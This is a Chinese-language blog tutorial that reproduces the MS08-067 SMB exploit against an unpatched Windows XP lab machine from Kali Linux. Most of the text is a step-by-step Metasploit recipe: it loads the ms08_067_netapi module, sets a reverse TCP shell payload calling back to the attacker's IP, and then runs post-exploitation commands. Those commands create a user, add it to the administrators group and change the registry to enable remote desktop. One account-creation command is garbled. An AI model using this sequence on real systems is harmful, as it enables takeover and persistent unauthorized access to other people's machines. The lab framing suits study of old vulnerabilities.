天天看點

漏洞利用實戰(一) winxp的ms08_067漏洞利用複現1  ms08_0672  操作概述3  實驗環境4  控制靶機5  遠端桌面連接配接6  問題記錄7  小結

我竟然把這個坑填下去了,可喜可賀。

1  ms08_067

      ms08_067是微軟win作業系統中存在的一個伺服器服務漏洞,在win server2008之前的系統都會受這個漏洞影響,黑客可以利用這個漏洞控制目标系統。

2  操作概述

      使用kali linux攻擊機對win xp系統利用此漏洞進行攻擊,在靶機上建立管理者賬号并遠端控制靶機。

3  實驗環境

    kali linux攻擊機(上一篇部落格提到過)

    win xp sp3 english(純淨版,不帶任何更新檔)

4  控制靶機

    進入kali終端,輸入以下指令運作msf:

msfconsole
           

尋找并使用子產品

    我們要找的是ms08_067漏洞,是以我們首先尋找此漏洞

search ms08_067_netapi
           

    我們找到漏洞後,使用此漏洞

use exploit/windows/smb/ms08_067_netapi
           

加載攻擊載體

    攻擊載體有很多,我們這次使用shell_reverse_tcp

set payload generic/shell_reverse_tcp 
           

設定ip

    LHOST為攻擊機ip,RHOST為靶機ip,例如:

set LHOST 192.168.1.62
           

尋找對應版本target

    target需要與靶機系統版本對應,在不确定版本時設定target為0也可自動選擇

set target 0
           

運作

exploit
           

    到此,我們就進入了靶機系統,你的kali Terminal應該顯示以下資訊。

漏洞利用實戰(一) winxp的ms08_067漏洞利用複現1  ms08_0672  操作概述3  實驗環境4  控制靶機5  遠端桌面連接配接6  問題記錄7  小結

5  遠端桌面連接配接

    接下來,我們嘗試在靶機上建立賬戶并使用遠端桌面連接配接靶機,

    首先,我們建立一個賬戶。

user net host-name password /add
           

    提升為管理者權限

net localgroup administrators host-name /add
           

    winxp遠端操控端口為3389,我們将這個端口打開

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           

    使用netstat檢視端口

netstat -an
           

    這時,我們會發現3389端口處于開啟狀态。

    然後,我們可以用區域網路内的計算機遠端桌面連接配接到靶機,win10運作——>MSTSC。

    以上就是ms08_067漏洞利用複現的全過程。

6  問題記錄

通路445端口被拒絕

    裝了445端口更新檔的winxp将445端口停用,是以複現此例程時不要使用帶更新檔的win xp。

    還有可能是因為靶機打開了防火牆,複現時需要将防火牆關閉。

設定target

    如果不設定target,将不會判斷靶機的系統版本進行攻擊。建議将target設定為0,target為0時會自動判斷靶機系統版本攻擊。

7  小結

    winxp上的漏洞其實還有很多,感興趣的同學可以查一下其他的漏洞并嘗試複現,折騰永不停止!

繼續閱讀